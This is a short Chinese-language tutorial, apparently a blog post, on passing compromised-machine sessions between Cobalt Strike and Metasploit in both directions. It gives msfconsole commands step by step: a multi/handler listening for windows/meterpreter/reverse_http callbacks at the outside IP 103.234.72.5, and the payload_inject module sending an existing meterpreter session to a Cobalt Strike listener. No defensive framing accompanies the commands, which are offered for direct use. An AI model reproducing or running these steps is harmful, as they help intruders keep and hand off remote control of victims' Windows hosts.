CS与msf联动

一、CS的session转到msf上

1、cs上线一台pc

CS与msf联动

2、设置msf监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http(这里注意不是TCP,cs4.2我没找到外连TCP的)

set lhost 103.234.72.5

set lport 10086

show options

exploit

3、cs设置监听器

CS与msf联动

右击spawn,选择这个监听器。

CS与msf联动

回到msf可以看到机器已经上线。

CS与msf联动

sessions -l 查看所有session

CS与msf联动

session 1 进入第一个shell

在里面输入exit就断开链接。

CS与msf联动

CS与msf联动

二、msf的session转到CS上

1、首先把msf上获取到的meterpreter挂在后台运行

执行命令:background,即可

2、然后使用 exploit/windows/local/payload_inject来注入一个新的payload到session中,具体命令如下:

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set LHOST 103.234.72.5 //cs主机地址

set LPORT 84 //随意设置监听端口,需要和cs保持一致

set session 2 //设置需要派送的meterpreter

set DisablePayloadHandler true //禁止产生一个新的handler

CS与msf联动

CS与msf联动

可以看到cs那边机器已经上线。

CS与msf联动

上一篇:msf之meterpreter权限绑定以及端口转发


下一篇:Kali入侵入门版笔记!!!